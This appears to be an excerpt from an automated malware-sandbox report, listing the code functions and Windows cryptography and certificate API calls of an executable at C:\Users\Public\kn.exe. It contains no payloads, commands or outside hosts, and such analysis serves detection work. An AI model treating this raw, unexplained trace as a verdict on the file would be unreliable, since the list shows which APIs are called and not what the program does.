                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,25_2_00007FF67DEC5F04
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,25_2_00007FF67DF07EE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEBDEB0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,25_2_00007FF67DE8DEA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,25_2_00007FF67DF35FF0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,25_2_00007FF67DEFDE70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEC1E2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE65DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,25_2_00007FF67DE65DF7
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE41DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,25_2_00007FF67DE41DE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE65DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,25_2_00007FF67DE65DA1
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8DD80 CertFindExtension,CryptDecodeObject,25_2_00007FF67DE8DD80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,25_2_00007FF67DEE5D80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE91D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE91D70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE89D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE89D6C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,25_2_00007FF67DEB3D60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,25_2_00007FF67DF07D3C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,25_2_00007FF67DF0BD3C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35D74 CryptDecodeObjectEx,strcmp,strcmp,25_2_00007FF67DF35D74
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE660DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,25_2_00007FF67DE660DA
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,25_2_00007FF67DEA4070
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,25_2_00007FF67DEFE044
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,25_2_00007FF67DF35E3C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE65FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,25_2_00007FF67DE65FE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,25_2_00007FF67DED5FA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,25_2_00007FF67DED9F90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,25_2_00007FF67DE6FF64
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,25_2_00007FF67DEA5F54
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35F20 CryptDecodeObjectEx,25_2_00007FF67DF35F20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,25_2_00007FF67DF0BB50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE93B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,25_2_00007FF67DE93B14
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,25_2_00007FF67DEC9AF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35B90 CryptDecodeObjectEx,memmove,25_2_00007FF67DF35B90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,25_2_00007FF67DEFFA84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED7A70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,25_2_00007FF67DEE9A58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEBA50 CryptSignCertificate,SetLastError,25_2_00007FF67DEEBA50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED1A44
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE63A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE63A40
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35C54 CryptDecodeObjectEx,CryptDecodeObjectEx,25_2_00007FF67DF35C54
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,25_2_00007FF67DEBB9CC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,25_2_00007FF67DE5F9B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE67988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,25_2_00007FF67DE67988
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,25_2_00007FF67DEB597C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,25_2_00007FF67DEF9970
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB950 I_CryptGetLruEntryData,#357,25_2_00007FF67DEBB950
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8F944 CryptDecodeObject,GetLastError,#357,25_2_00007FF67DE8F944
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFFD2C CryptDecryptMessage,GetLastError,#357,25_2_00007FF67DEFFD2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,25_2_00007FF67DEEDD1C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,25_2_00007FF67DF2B980
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,25_2_00007FF67DEC5CE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,25_2_00007FF67DEC1C84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE83C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DE83C60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,25_2_00007FF67DF0BA14
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE71C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,25_2_00007FF67DE71C50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE8FC34
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,25_2_00007FF67DE6FC20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED3BEB
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE59BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,25_2_00007FF67DE59BC8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35AA8 CryptDecodeObjectEx,25_2_00007FF67DF35AA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,25_2_00007FF67DEDBBC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE35BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DE35BA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,25_2_00007FF67DEFFB94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,25_2_00007FF67DE5BB80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,25_2_00007FF67DF07B60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,25_2_00007FF67DEDFB50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF05B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,25_2_00007FF67DF05B44
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE9BB38
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED36E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,25_2_00007FF67DEBF6D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE876B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DE876B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEED6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,25_2_00007FF67DEED6A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF9688 CryptFindOIDInfo,#357,#360,#360,#360,25_2_00007FF67DEF9688
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,25_2_00007FF67DEA366C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,25_2_00007FF67DEBB664
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE45664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,25_2_00007FF67DE45664
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,25_2_00007FF67DE5D660
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,25_2_00007FF67DED3654
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF650 CryptHashCertificate2,SetLastError,25_2_00007FF67DEFF650
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DECF644
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F630 CryptAcquireContextW,GetLastError,#357,SetLastError,25_2_00007FF67DE5F630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,25_2_00007FF67DEB95FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE955F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,25_2_00007FF67DE955F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE5D5C2
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DF098B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED3590
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF570 CryptHashCertificate,SetLastError,25_2_00007FF67DEFF570
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,25_2_00007FF67DE9B55C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE53918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE53918
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,25_2_00007FF67DED391C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,25_2_00007FF67DEFF918
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE438FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,25_2_00007FF67DE438FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF09580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,25_2_00007FF67DF09580
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,25_2_00007FF67DEA18DC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB8D0 I_CryptGetLruEntryData,#357,25_2_00007FF67DEBB8D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,25_2_00007FF67DEA9878
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE67884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,25_2_00007FF67DE67884
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED3860
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,25_2_00007FF67DEBD850
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,25_2_00007FF67DEC184C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,25_2_00007FF67DEBB808
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,25_2_00007FF67DE6F810
